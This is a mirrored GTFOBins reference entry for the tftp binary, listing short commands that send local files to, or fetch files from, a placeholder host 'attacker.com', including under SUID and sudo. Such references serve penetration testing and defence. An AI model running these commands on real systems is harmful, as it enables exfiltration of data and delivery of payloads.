1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-02-01 21:53:35 +01:00
GTFOBins.github.io/_gtfobins/tftp.md
2018-07-22 18:24:39 +01:00

28 lines
644 B
Markdown

---
functions:
upload:
- description: Send local file to a TFTP server.
code: |
RHOST=attacker.com
tftp $RHOST
put file_to_send
download:
- description: Fetch a remote file from a TFTP server.
code: |
RHOST=attacker.com
tftp $RHOST
get file_to_get
suid-enabled:
- description: Send local file to a TFTP server.
code: |
RHOST=attacker.com
./tftp $RHOST
put file_to_send
sudo-enabled:
- description: Send local file to a TFTP server.
code: |
RHOST=attacker.com
sudo -E tftp $RHOST
put file_to_send
---